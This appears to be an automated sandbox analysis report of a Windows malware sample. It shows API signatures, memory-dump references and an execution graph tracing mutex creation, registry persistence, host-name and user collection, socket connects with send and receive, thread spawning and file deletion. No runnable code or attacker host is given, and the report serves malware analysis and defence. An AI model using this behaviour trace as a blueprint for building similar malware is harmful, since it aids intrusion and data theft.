                                                                                                                        • Instruction Fuzzy Hash: 7CE0D826D512186B8F00B67DEC419CE739DDD65725B818037E91AE3210EB685D458AF8
                                                                                                                        Function 02D4AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4AF58
                                                                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 02D4AF88
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02D4AFA7
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4AFB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$Write
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3448952669-0
                                                                                                                        • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                        • Instruction ID: ff5d07aa2ebba0ef9811bb4dfbb4e251ed13d708d4d1b71fab4d40cf3ad0be1c
                                                                                                                        • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                        • Instruction Fuzzy Hash: 1321B4B268061AABDB11DF69CC80BAE73A9FF84351F004651FD14973C0DB34EC11CAA4

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.9%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:4.1%
                                                                                                                        Total number of Nodes:992
                                                                                                                        Total number of Limit Nodes:49
                                                                                                                        execution_graph 46088 293d4d0 46089 293d4e6 _Yarn ___scrt_fastfail 46088->46089 46103 293d6e3 46089->46103 46109 2951f99 21 API calls ___crtLCMapStringA 46089->46109 46092 293d6f4 46093 293d734 46092->46093 46101 293d760 46092->46101 46105 2951f99 21 API calls ___crtLCMapStringA 46092->46105 46095 293d696 ___scrt_fastfail 46095->46093 46110 2951f99 21 API calls ___crtLCMapStringA 46095->46110 46098 293d72d ___scrt_fastfail 46098->46093 46106 295264f 46098->46106 46100 293d6be ___scrt_fastfail 46100->46093 46111 2951f99 21 API calls ___crtLCMapStringA 46100->46111 46101->46093 46112 293d474 21 API calls ___scrt_fastfail 46101->46112 46103->46093 46104 293d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46103->46104 46104->46092 46105->46098 46113 295256f 46106->46113 46108 2952657 46108->46101 46109->46095 46110->46100 46111->46103 46112->46093 46114 2952588 46113->46114 46118 295257e 46113->46118 46114->46118 46119 2951f99 21 API calls ___crtLCMapStringA 46114->46119 46116 29525a9 46116->46118 46120 295293a CryptAcquireContextA 46116->46120 46118->46108 46119->46116 46121 295295b CryptGenRandom 46120->46121 46123 2952956 46120->46123 46122 2952970 CryptReleaseContext 46121->46122 46121->46123 46122->46123 46123->46118 46124 2946030 46129 29460f7 recv 46124->46129 46130 2946091 46135 294610e send 46130->46135 46136 294ea1e 46137 294ea29 46136->46137 46138 294ea3d 46137->46138 46140 2951fc3 46137->46140 46141 2951fd2 46140->46141 46142 2951fce 46140->46142 46144 295fcda 46141->46144 46142->46138 46145 296b9be 46144->46145 46146 296b9d6 46145->46146 46147 296b9cb 46145->46147 46149 296b9de 46146->46149 46155 296b9e7 _strftime 46146->46155 46157 2966aff 46147->46157 46164 2966ac5 20 API calls _free 46149->46164 46151 296ba11 RtlReAllocateHeap 46153 296b9d3 46151->46153 46151->46155 46152 296b9ec 46165 2965354 20 API calls __dosmaperr 46152->46165 46153->46142 46155->46151 46155->46152 46166 2962200 7 API calls 2 library calls 46155->46166 46158 2966b3d 46157->46158 46162 2966b0d _strftime 46157->46162 46168 2965354 20 API calls __dosmaperr 46158->46168 46159 2966b28 RtlAllocateHeap 46161 2966b3b 46159->46161 46159->46162 46161->46153 46162->46158 46162->46159 46167 2962200 7 API calls 2 library calls 46162->46167 46164->46153 46165->46153 46166->46155 46167->46162 46168->46161 46169 29539be 46170 29539ca CallCatchBlock 46169->46170 46201 29536b3 46170->46201 46172 29539d1 46173 2953b24 46172->46173 46178 29539fb 46172->46178 46501 2953b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46173->46501 46175 2953b2b 46176 2953b31 46175->46176 46502 29626be 28 API calls _Atexit 46175->46502 46503 2962670 28 API calls _Atexit 46176->46503 46186 2953a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46178->46186 46495 29634d1 5 API calls ___crtLCMapStringA 46178->46495 46180 2953b39 46182 2953a14 46183 2953a1a 46182->46183 46496 2963475 5 API calls ___crtLCMapStringA 46182->46496 46185 2953a9b 46212 2953c5e 46185->46212 46186->46185 46497 295edf4 35 API calls 3 library calls 46186->46497 46195 2953abd 46195->46175 46196 2953ac1 46195->46196 46197 2953aca 46196->46197 46499 2962661 28 API calls _Atexit 46196->46499 46500 2953842 13 API calls 2 library calls 46197->46500 46200 2953ad2 46200->46183 46202 29536bc 46201->46202 46504 2953e0a IsProcessorFeaturePresent 46202->46504 46204 29536c8 46505 29579ee 10 API calls 3 library calls 46204->46505 46206 29536cd 46207 29536d1 46206->46207 46506 296335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46206->46506 46207->46172 46209 29536da 46210 29536e8 46209->46210 46507 2957a17 8 API calls 3 library calls 46209->46507 46210->46172 46508 2956050 46212->46508 46215 2953aa1 46216 2963422 46215->46216 46510 296ddc9 46216->46510 46218 2953aaa 46221 292d767 46218->46221 46219 296342b 46219->46218 46514 296e0d3 35 API calls 46219->46514 46516 293bce3 LoadLibraryA GetProcAddress 46221->46516 46223 292d783 GetModuleFileNameW 46521 292e168 46223->46521 46225 292d79f 46536 2921fbd 46225->46536 46228 2921fbd 28 API calls 46229 292d7bd 46228->46229 46540 293afc3 46229->46540 46233 292d7cf 46565 2921d8c 46233->46565 46235 292d7d8 46236 292d835 46235->46236 46237 292d7eb 46235->46237 46571 2921d64 46236->46571 46822 292e986 111 API calls 46237->46822 46240 292d845 46243 2921d64 22 API calls 46240->46243 46241 292d7fd 46242 2921d64 22 API calls 46241->46242 46245 292d809 46242->46245 46244 292d864 46243->46244 46576 2924cbf 46244->46576 46823 292e937 65 API calls 46245->46823 46247 292d873 46580 2925ce6 46247->46580 46250 292d87f 46583 2921eef 46250->46583 46251 292d824 46824 292e155 65 API calls 46251->46824 46254 292d88b 46587 2921eea 46254->46587 46256 292d894 46258 2921eea 11 API calls 46256->46258 46257 2921eea 11 API calls 46259 292dc9f 46257->46259 46260 292d89d 46258->46260 46498 2953c94 GetModuleHandleW 46259->46498 46261 2921d64 22 API calls 46260->46261 46262 292d8a6 46261->46262 46591 2921ebd 46262->46591 46264 292d8b1 46265 2921d64 22 API calls 46264->46265 46266 292d8ca 46265->46266 46267 2921d64 22 API calls 46266->46267 46269 292d8e5 46267->46269 46268 292d946 46270 2921d64 22 API calls 46268->46270 46285 292e134 46268->46285 46269->46268 46825 29285b4 46269->46825 46276 292d95d 46270->46276 46272 292d912 46273 2921eef 11 API calls 46272->46273 46274 292d91e 46273->46274 46277 2921eea 11 API calls 46274->46277 46275 292d9a4 46595 292bed7 46275->46595 46276->46275 46282 29324b7 3 API calls 46276->46282 46279 292d927 46277->46279 46829 29324b7 RegOpenKeyExA 46279->46829 46280 292d9aa 46281 292d82d 46280->46281 46598 293a463 46280->46598 46281->46257 46287 292d988 46282->46287 46905 2932902 30 API calls 46285->46905 46286 292d9c5 46288 292da18 46286->46288 46615 292697b 46286->46615 46287->46275 46832 2932902 30 API calls 46287->46832 46292 2921d64 22 API calls 46288->46292 46294 292da21 46292->46294 46303 292da32 46294->46303 46304 292da2d 46294->46304 46295 292e14a 46906 29312b5 64 API calls ___scrt_fastfail 46295->46906 46296 292d9e4 46833 292699d 30 API calls 46296->46833 46297 292d9ee 46301 2921d64 22 API calls 46297->46301 46310 292d9f7 46301->46310 46302 292d9e9 46834 29264d0 97 API calls 46302->46834 46307 2921d64 22 API calls 46303->46307 46836 29269ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46304->46836 46308 292da3b 46307->46308 46619 293ae08 46308->46619 46310->46288 46313 292da13 46310->46313 46311 292da46 46623 2921e18 46311->46623 46835 29264d0 97 API calls 46313->46835 46314 292da51 46627 2921e13 46314->46627 46317 292da5a 46318 2921d64 22 API calls 46317->46318 46319 292da63 46318->46319 46320 2921d64 22 API calls 46319->46320 46321 292da7d 46320->46321 46322 2921d64 22 API calls 46321->46322 46323 292da97 46322->46323 46324 2921d64 22 API calls 46323->46324 46326 292dab0 46324->46326 46325 292db1d 46327 292db2c 46325->46327 46334 292dcaa ___scrt_fastfail 46325->46334 46326->46325 46328 2921d64 22 API calls 46326->46328 46329 292db35 46327->46329 46357 292dbb1 ___scrt_fastfail 46327->46357 46332 292dac5 _wcslen 46328->46332 46330 2921d64 22 API calls 46329->46330 46331 292db3e 46330->46331 46333 2921d64 22 API calls 46331->46333 46332->46325 46335 2921d64 22 API calls 46332->46335 46336 292db50 46333->46336 46896 293265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46334->46896 46337 292dae0 46335->46337 46339 2921d64 22 API calls 46336->46339 46341 2921d64 22 API calls 46337->46341 46340 292db62 46339->46340 46344 2921d64 22 API calls 46340->46344 46342 292daf5 46341->46342 46837 292c89e 46342->46837 46343 292dcef 46345 2921d64 22 API calls 46343->46345 46346 292db8b 46344->46346 46347 292dd16 46345->46347 46352 2921d64 22 API calls 46346->46352 46641 2921f66 46347->46641 46350 2921e18 11 API calls 46351 292db14 46350->46351 46354 2921e13 11 API calls 46351->46354 46355 292db9c 46352->46355 46354->46325 46894 292bc67 45 API calls _wcslen 46355->46894 46356 292dd25 46645 29326d2 RegCreateKeyA 46356->46645 46631 29328a2 46357->46631 46362 292dc45 ctype 46366 2921d64 22 API calls 46362->46366 46363 292dbac 46363->46357 46364 2921d64 22 API calls 46365 292dd47 46364->46365 46651 295a5e7 46365->46651 46367 292dc5c 46366->46367 46367->46343 46371 292dc70 46367->46371 46370 292dd5e 46897 293beb0 86 API calls ___scrt_fastfail 46370->46897 46373 2921d64 22 API calls 46371->46373 46372 292dd81 46378 2921f66 28 API calls 46372->46378 46375 292dc7e 46373->46375 46376 293ae08 28 API calls 46375->46376 46380 292dc87 46376->46380 46377 292dd65 CreateThread 46377->46372 47295 293c96f 10 API calls 46377->47295 46379 292dd96 46378->46379 46381 2921f66 28 API calls 46379->46381 46895 292e219 109 API calls 46380->46895 46383 292dda5 46381->46383 46655 293a686 46383->46655 46384 292dc8c 46384->46343 46386 292dc93 46384->46386 46386->46281 46388 2921d64 22 API calls 46389 292ddb6 46388->46389 46390 2921d64 22 API calls 46389->46390 46391 292ddcb 46390->46391 46392 2921d64 22 API calls 46391->46392 46393 292ddeb 46392->46393 46394 295a5e7 _strftime 39 API calls 46393->46394 46395 292ddf8 46394->46395 46396 2921d64 22 API calls 46395->46396 46397 292de03 46396->46397 46398 2921d64 22 API calls 46397->46398 46399 292de14 46398->46399 46400 2921d64 22 API calls 46399->46400 46401 292de29 46400->46401 46402 2921d64 22 API calls 46401->46402 46403 292de3a 46402->46403 46404 292de41 StrToIntA 46403->46404 46679 2929517 46404->46679 46407 2921d64 22 API calls 46408 292de5c 46407->46408 46409 292dea1 46408->46409 46410 292de68 46408->46410 46412 2921d64 22 API calls 46409->46412 46898 295360d 22 API calls 3 library calls 46410->46898 46414 292deb1 46412->46414 46413 292de71 46415 2921d64 22 API calls 46413->46415 46417 292def9 46414->46417 46418 292debd 46414->46418 46416 292de84 46415->46416 46419 292de8b CreateThread 46416->46419 46421 2921d64 22 API calls 46417->46421 46899 295360d 22 API calls 3 library calls 46418->46899 46419->46409 47292 2939128 102 API calls 2 library calls 46419->47292 46423 292df02 46421->46423 46422 292dec6 46424 2921d64 22 API calls 46422->46424 46426 292df0e 46423->46426 46427 292df6c 46423->46427 46425 292ded8 46424->46425 46430 292dedf CreateThread 46425->46430 46429 2921d64 22 API calls 46426->46429 46428 2921d64 22 API calls 46427->46428 46431 292df75 46428->46431 46432 292df1e 46429->46432 46430->46417 47297 2939128 102 API calls 2 library calls 46430->47297 46433 292df81 46431->46433 46434 292dfba 46431->46434 46435 2921d64 22 API calls 46432->46435 46437 2921d64 22 API calls 46433->46437 46704 293a7a2 GetComputerNameExW GetUserNameW 46434->46704 46438 292df33 46435->46438 46440 292df8a 46437->46440 46900 292c854 31 API calls 46438->46900 46445 2921d64 22 API calls 46440->46445 46441 2921e18 11 API calls 46442 292dfce 46441->46442 46444 2921e13 11 API calls 46442->46444 46447 292dfd7 46444->46447 46448 292df9f 46445->46448 46446 292df46 46449 2921e18 11 API calls 46446->46449 46450 292dfe3 CreateThread 46447->46450 46451 292dfe0 SetProcessDEPPolicy 46447->46451 46459 295a5e7 _strftime 39 API calls 46448->46459 46452 292df52 46449->46452 46453 292e004 46450->46453 46454 292dff8 CreateThread 46450->46454 47265 292e54f 46450->47265 46451->46450 46455 2921e13 11 API calls 46452->46455 46457 292e019 46453->46457 46458 292e00d CreateThread 46453->46458 46454->46453 47293 2930f36 137 API calls 46454->47293 46456 292df5b CreateThread 46455->46456 46456->46427 47294 292196b 49 API calls _strftime 46456->47294 46461 292e073 46457->46461 46463 2921f66 28 API calls 46457->46463 46458->46457 47296 2931524 38 API calls ___scrt_fastfail 46458->47296 46460 292dfac 46459->46460 46901 292b95c 7 API calls 46460->46901 46715 293246e RegOpenKeyExA 46461->46715 46464 292e046 46463->46464 46902 2924c9e 28 API calls 46464->46902 46468 292e053 46470 2921f66 28 API calls 46468->46470 46469 292e12a 46727 292cbac 46469->46727 46472 292e062 46470->46472 46471 293ae08 28 API calls 46474 292e0a4 46471->46474 46475 293a686 79 API calls 46472->46475 46718 2932584 RegOpenKeyExW 46474->46718 46477 292e067 46475->46477 46479 2921eea 11 API calls 46477->46479 46479->46461 46482 2921e13 11 API calls 46484 292e0c5 46482->46484 46483 292e0ed DeleteFileW 46483->46484 46485 292e0f4 46483->46485 46484->46483 46484->46485 46487 292e0db Sleep 46484->46487 46486 293ae08 28 API calls 46485->46486 46488 292e104 46486->46488 46903 2921e07 46487->46903 46723 293297a RegOpenKeyExW 46488->46723 46491 292e117 46492 2921e13 11 API calls 46491->46492 46493 292e121 46492->46493 46494 2921e13 11 API calls 46493->46494 46494->46469 46495->46182 46496->46186 46497->46185 46498->46195 46499->46197 46500->46200 46501->46175 46502->46176 46503->46180 46504->46204 46505->46206 46506->46209 46507->46207 46509 2953c71 GetStartupInfoW 46508->46509 46509->46215 46511 296ddd2 46510->46511 46513 296dddb 46510->46513 46515 296dcc8 48 API calls 4 library calls 46511->46515 46513->46219 46514->46219 46515->46513 46517 293bd22 LoadLibraryA GetProcAddress 46516->46517 46518 293bd12 GetModuleHandleA GetProcAddress 46516->46518 46519 293bd4b 32 API calls 46517->46519 46520 293bd3b LoadLibraryA GetProcAddress 46517->46520 46518->46517 46519->46223 46520->46519 46907 293a63f FindResourceA 46521->46907 46525 292e192 _Yarn 46917 2921f86 46525->46917 46528 2921eef 11 API calls 46529 292e1b8 46528->46529 46530 2921eea 11 API calls 46529->46530 46531 292e1c1 46530->46531 46532 295a88c ___crtLCMapStringA 21 API calls 46531->46532 46533 292e1d2 _Yarn 46532->46533 46921 2926052 46533->46921 46535 292e205 46535->46225 46537 2921fcc 46536->46537 46931 2922501 46537->46931 46539 2921fea 46539->46228 46560 293afd6 46540->46560 46541 293b046 46542 2921eea 11 API calls 46541->46542 46543 293b078 46542->46543 46544 2921eea 11 API calls 46543->46544 46546 293b080 46544->46546 46545 293b048 46938 2923b60 28 API calls 46545->46938 46549 2921eea 11 API calls 46546->46549 46551 292d7c6 46549->46551 46550 293b054 46552 2921eef 11 API calls 46550->46552 46561 292e8bd 46551->46561 46554 293b05d 46552->46554 46553 2921eef 11 API calls 46553->46560 46556 2921eea 11 API calls 46554->46556 46555 2921eea 11 API calls 46555->46560 46557 293b065 46556->46557 46939 293bfa9 28 API calls 46557->46939 46560->46541 46560->46545 46560->46553 46560->46555 46936 2923b60 28 API calls 46560->46936 46937 293bfa9 28 API calls 46560->46937 46562 292e8ca 46561->46562 46563 292e8da 46562->46563 46940 292200a 11 API calls 46562->46940 46563->46233 46566 292200a 46565->46566 46570 292203a 46566->46570 46941 2922654 11 API calls 46566->46941 46568 292202b 46942 29226ba 11 API calls _Deallocate 46568->46942 46570->46235 46572 2921d6c 46571->46572 46573 2921d74 46572->46573 46943 2921fff 22 API calls 46572->46943 46573->46240 46577 2924ccb 46576->46577 46944 2922e78 46577->46944 46579 2924cee 46579->46247 46953 2924bc4 46580->46953 46582 2925cf4 46582->46250 46584 2921efe 46583->46584 46586 2921f0a 46584->46586 46962 29221b9 11 API calls 46584->46962 46586->46254 46589 29221b9 46587->46589 46588 29221e8 46588->46256 46589->46588 46963 292262e 11 API calls _Deallocate 46589->46963 46593 2921ec9 46591->46593 46592 2921ee4 46592->46264 46593->46592 46594 2922325 28 API calls 46593->46594 46594->46592 46964 2921e8f 46595->46964 46597 292bee1 CreateMutexA GetLastError 46597->46280 46966 293b15b 46598->46966 46603 2921eef 11 API calls 46604 293a49f 46603->46604 46605 2921eea 11 API calls 46604->46605 46606 293a4a7 46605->46606 46607 2932513 31 API calls 46606->46607 46609 293a4fa 46606->46609 46608 293a4cd 46607->46608 46610 293a4d8 StrToIntA 46608->46610 46609->46286 46611 293a4ef 46610->46611 46612 293a4e6 46610->46612 46614 2921eea 11 API calls 46611->46614 46974 293c102 22 API calls 46612->46974 46614->46609 46616 292698f 46615->46616 46617 29324b7 3 API calls 46616->46617 46618 2926996 46617->46618 46618->46296 46618->46297 46620 293ae1c 46619->46620 46975 292b027 46620->46975 46622 293ae24 46622->46311 46624 2921e27 46623->46624 46626 2921e33 46624->46626 46984 2922121 11 API calls 46624->46984 46626->46314 46629 2922121 46627->46629 46628 2922150 46628->46317 46629->46628 46985 2922718 11 API calls _Deallocate 46629->46985 46632 29328c0 46631->46632 46633 2926052 28 API calls 46632->46633 46634 29328d5 46633->46634 46635 2921fbd 28 API calls 46634->46635 46636 29328e5 46635->46636 46637 29326d2 14 API calls 46636->46637 46638 29328ef 46637->46638 46639 2921eea 11 API calls 46638->46639 46640 29328fc 46639->46640 46640->46362 46642 2921f6e 46641->46642 46986 2922301 46642->46986 46646 2932722 46645->46646 46647 29326eb 46645->46647 46648 2921eea 11 API calls 46646->46648 46650 29326fd RegSetValueExA RegCloseKey 46647->46650 46649 292dd3b 46648->46649 46649->46364 46650->46646 46652 295a600 _strftime 46651->46652 46990 295993e 46652->46990 46654 292dd54 46654->46370 46654->46372 46656 293a737 46655->46656 46657 293a69c GetLocalTime 46655->46657 46658 2921eea 11 API calls 46656->46658 46659 2924cbf 28 API calls 46657->46659 46660 293a73f 46658->46660 46661 293a6de 46659->46661 46662 2921eea 11 API calls 46660->46662 46663 2925ce6 28 API calls 46661->46663 46664 292ddaa 46662->46664 46665 293a6ea 46663->46665 46664->46388 47018 29227cb 46665->47018 46667 293a6f6 46668 2925ce6 28 API calls 46667->46668 46669 293a702 46668->46669 47021 2926478 76 API calls 46669->47021 46671 293a710 46672 2921eea 11 API calls 46671->46672 46673 293a71c 46672->46673 46674 2921eea 11 API calls 46673->46674 46675 293a725 46674->46675 46676 2921eea 11 API calls 46675->46676 46677 293a72e 46676->46677 46678 2921eea 11 API calls 46677->46678 46678->46656 46680 2929536 _wcslen 46679->46680 46681 2929541 46680->46681 46682 2929558 46680->46682 46683 292c89e 31 API calls 46681->46683 46684 292c89e 31 API calls 46682->46684 46686 2929549 46683->46686 46685 2929560 46684->46685 46687 2921e18 11 API calls 46685->46687 46688 2921e18 11 API calls 46686->46688 46689 292956e 46687->46689 46690 2929553 46688->46690 46691 2921e13 11 API calls 46689->46691 46693 2921e13 11 API calls 46690->46693 46692 2929576 46691->46692 47041 292856b 28 API calls 46692->47041 46695 29295ad 46693->46695 47026 2929837 46695->47026 46697 2929588 47042 29228cf 46697->47042 46700 2929593 46701 2921e18 11 API calls 46700->46701 46702 292959d 46701->46702 46703 2921e13 11 API calls 46702->46703 46703->46690 47061 2923b40 46704->47061 46708 293a7fd 46709 29228cf 28 API calls 46708->46709 46710 293a807 46709->46710 46711 2921e13 11 API calls 46710->46711 46712 293a810 46711->46712 46713 2921e13 11 API calls 46712->46713 46714 292dfc3 46713->46714 46714->46441 46716 293248f RegQueryValueExA RegCloseKey 46715->46716 46717 292e08b 46715->46717 46716->46717 46717->46469 46717->46471 46719 29325b0 RegQueryValueExW RegCloseKey 46718->46719 46720 29325dd 46718->46720 46719->46720 46721 2923b40 28 API calls 46720->46721 46722 292e0ba 46721->46722 46722->46482 46724 2932992 RegDeleteValueW 46723->46724 46725 29329a6 46723->46725 46724->46725 46726 29329a2 46724->46726 46725->46491 46726->46491 46728 292cbc5 46727->46728 46729 293246e 3 API calls 46728->46729 46730 292cbcc 46729->46730 46734 292cbeb 46730->46734 47094 2921602 46730->47094 46732 292cbd9 47097 29327d5 RegCreateKeyA 46732->47097 46735 2933fd4 46734->46735 46736 2933feb 46735->46736 47111 293aa73 46736->47111 46738 2933ff6 46739 2921d64 22 API calls 46738->46739 46740 293400f 46739->46740 46741 295a5e7 _strftime 39 API calls 46740->46741 46742 293401c 46741->46742 46743 2934021 Sleep 46742->46743 46744 293402e 46742->46744 46743->46744 46745 2921f66 28 API calls 46744->46745 46746 293403d 46745->46746 46747 2921d64 22 API calls 46746->46747 46748 293404b 46747->46748 46749 2921fbd 28 API calls 46748->46749 46750 2934053 46749->46750 46751 293afc3 28 API calls 46750->46751 46752 293405b 46751->46752 47115 2924262 WSAStartup 46752->47115 46754 2934065 46755 2921d64 22 API calls 46754->46755 46756 293406e 46755->46756 46757 2921d64 22 API calls 46756->46757 46782 29340ed 46756->46782 46758 2934087 46757->46758 46759 2921d64 22 API calls 46758->46759 46761 2934098 46759->46761 46760 2921fbd 28 API calls 46760->46782 46763 2921d64 22 API calls 46761->46763 46762 293afc3 28 API calls 46762->46782 46764 29340a9 46763->46764 46766 2921d64 22 API calls 46764->46766 46765 29285b4 28 API calls 46765->46782 46767 29340ba 46766->46767 46769 2921d64 22 API calls 46767->46769 46768 2921eef 11 API calls 46768->46782 46770 29340cb 46769->46770 46771 2921d64 22 API calls 46770->46771 46773 29340dd 46771->46773 46772 2921eea 11 API calls 46772->46782 47217 2924101 88 API calls 46773->47217 46775 2921d64 22 API calls 46775->46782 46777 2934244 WSAGetLastError 47218 293bc76 30 API calls 46777->47218 46782->46760 46782->46762 46782->46765 46782->46768 46782->46772 46782->46775 46782->46777 46784 293a686 79 API calls 46782->46784 46786 2924cbf 28 API calls 46782->46786 46787 2921d8c 11 API calls 46782->46787 46788 2925ce6 28 API calls 46782->46788 46789 295a5e7 _strftime 39 API calls 46782->46789 46791 29227cb 28 API calls 46782->46791 46792 2921f66 28 API calls 46782->46792 46797 2932513 31 API calls 46782->46797 46802 293446f 46782->46802 47116 2933f9a 46782->47116 47121 29241f1 46782->47121 47128 2924915 46782->47128 47143 292428c connect 46782->47143 47203 29247eb WaitForSingleObject 46782->47203 47219 2924c9e 28 API calls 46782->47219 47220 2933683 50 API calls 46782->47220 47221 29282dc 28 API calls 46782->47221 47222 2960c51 20 API calls 46782->47222 47223 293265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46782->47223 46784->46782 46786->46782 46787->46782 46788->46782 46790 2934b80 Sleep 46789->46790 46790->46782 46791->46782 46792->46782 46797->46782 46798 2923b40 28 API calls 46798->46802 46801 293aec8 28 API calls 46801->46802 46802->46782 46802->46798 46802->46801 46803 293ad46 28 API calls 46802->46803 46804 2921d64 22 API calls 46802->46804 46811 29227cb 28 API calls 46802->46811 46812 2925ce6 28 API calls 46802->46812 46813 292275c 28 API calls 46802->46813 46815 2921eea 11 API calls 46802->46815 46818 2921f66 28 API calls 46802->46818 46819 293a686 79 API calls 46802->46819 46820 2934b22 CreateThread 46802->46820 46821 2921e13 11 API calls 46802->46821 47224 292cbf1 6 API calls 46802->47224 47225 293adee 28 API calls 46802->47225 47227 293aca0 GetTickCount 46802->47227 47228 293ac52 30 API calls ___scrt_fastfail 46802->47228 47229 292e679 29 API calls 46802->47229 47230 29227ec 28 API calls 46802->47230 47231 2924468 60 API calls _Yarn 46802->47231 47232 29245d5 112 API calls ___crtLCMapStringA 46802->47232 47233 292a767 84 API calls 46802->47233 46803->46802 46805 29344ed GetTickCount 46804->46805 47226 293ad46 28 API calls 46805->47226 46811->46802 46812->46802 46813->46802 46815->46802 46818->46802 46819->46802 46820->46802 47258 2939e89 102 API calls 46820->47258 46821->46802 46822->46241 46823->46251 46826 29285c0 46825->46826 46827 2922e78 28 API calls 46826->46827 46828 29285e4 46827->46828 46828->46272 46830 29324e1 RegQueryValueExA RegCloseKey 46829->46830 46831 293250b 46829->46831 46830->46831 46831->46268 46832->46275 46833->46302 46834->46297 46835->46288 46836->46303 46838 292c8ba 46837->46838 46839 292c8da 46838->46839 46840 292c90f 46838->46840 46841 292c8d0 46838->46841 47259 293a74b 29 API calls 46839->47259 46844 293b15b GetCurrentProcess 46840->46844 46843 292ca03 GetLongPathNameW 46841->46843 46847 2923b40 28 API calls 46843->46847 46845 292c914 46844->46845 46848 292c96a 46845->46848 46849 292c918 46845->46849 46846 292c8e3 46850 2921e18 11 API calls 46846->46850 46851 292ca18 46847->46851 46852 2923b40 28 API calls 46848->46852 46853 2923b40 28 API calls 46849->46853 46854 292c8ed 46850->46854 46855 2923b40 28 API calls 46851->46855 46857 292c978 46852->46857 46858 292c926 46853->46858 46860 2921e13 11 API calls 46854->46860 46856 292ca27 46855->46856 47262 292cc37 28 API calls 46856->47262 46863 2923b40 28 API calls 46857->46863 46864 2923b40 28 API calls 46858->46864 46860->46841 46861 292ca3a 47263 2922860 28 API calls 46861->47263 46866 292c98e 46863->46866 46867 292c93c 46864->46867 46865 292ca45 47264 2922860 28 API calls 46865->47264 47261 2922860 28 API calls 46866->47261 47260 2922860 28 API calls 46867->47260 46871 292ca4f 46874 2921e13 11 API calls 46871->46874 46872 292c999 46875 2921e18 11 API calls 46872->46875 46873 292c947 46876 2921e18 11 API calls 46873->46876 46877 292ca59 46874->46877 46878 292c9a4 46875->46878 46879 292c952 46876->46879 46880 2921e13 11 API calls 46877->46880 46881 2921e13 11 API calls 46878->46881 46882 2921e13 11 API calls 46879->46882 46883 292ca62 46880->46883 46884 292c9ad 46881->46884 46885 292c95b 46882->46885 46886 2921e13 11 API calls 46883->46886 46887 2921e13 11 API calls 46884->46887 46888 2921e13 11 API calls 46885->46888 46889 292ca6b 46886->46889 46887->46854 46888->46854 46890 2921e13 11 API calls 46889->46890 46891 292ca74 46890->46891 46892 2921e13 11 API calls 46891->46892 46893 292ca7d 46892->46893 46893->46350 46894->46363 46895->46384 46896->46343 46897->46377 46898->46413 46899->46422 46900->46446 46901->46434 46902->46468 46904 2921e0c 46903->46904 46905->46295 46908 292e183 46907->46908 46909 293a65c LoadResource LockResource SizeofResource 46907->46909 46910 295a88c 46908->46910 46909->46908 46915 2966aff _strftime 46910->46915 46911 2966b3d 46925 2965354 20 API calls __dosmaperr 46911->46925 46912 2966b28 RtlAllocateHeap 46914 2966b3b 46912->46914 46912->46915 46914->46525 46915->46911 46915->46912 46924 2962200 7 API calls 2 library calls 46915->46924 46918 2921f8e 46917->46918 46926 2922325 46918->46926 46920 2921fa4 46920->46528 46922 2921f86 28 API calls 46921->46922 46923 2926066 46922->46923 46923->46535 46924->46915 46925->46914 46927 292232f 46926->46927 46929 292233a 46927->46929 46930 292294a 28 API calls 46927->46930 46929->46920 46930->46929 46932 292250d 46931->46932 46934 292252b 46932->46934 46935 292261a 28 API calls 46932->46935 46934->46539 46935->46934 46936->46560 46937->46560 46938->46550 46939->46541 46940->46563 46941->46568 46942->46570 46946 2922e85 46944->46946 46945 2922ea9 46945->46579 46946->46945 46947 2922e98 46946->46947 46949 2922eae 46946->46949 46951 2923445 28 API calls 46947->46951 46949->46945 46952 292225b 11 API calls 46949->46952 46951->46945 46952->46945 46954 2924bd0 46953->46954 46957 292245c 46954->46957 46956 2924be4 46956->46582 46958 2922469 46957->46958 46960 2922478 46958->46960 46961 2922ad3 28 API calls 46958->46961 46960->46956 46961->46960 46962->46586 46963->46588 46965 2921e94 46964->46965 46965->46597 46967 293a471 46966->46967 46968 293b168 GetCurrentProcess 46966->46968 46969 2932513 RegOpenKeyExA 46967->46969 46968->46967 46970 2932569 46969->46970 46971 2932541 RegQueryValueExA RegCloseKey 46969->46971 46972 2921f66 28 API calls 46970->46972 46971->46970 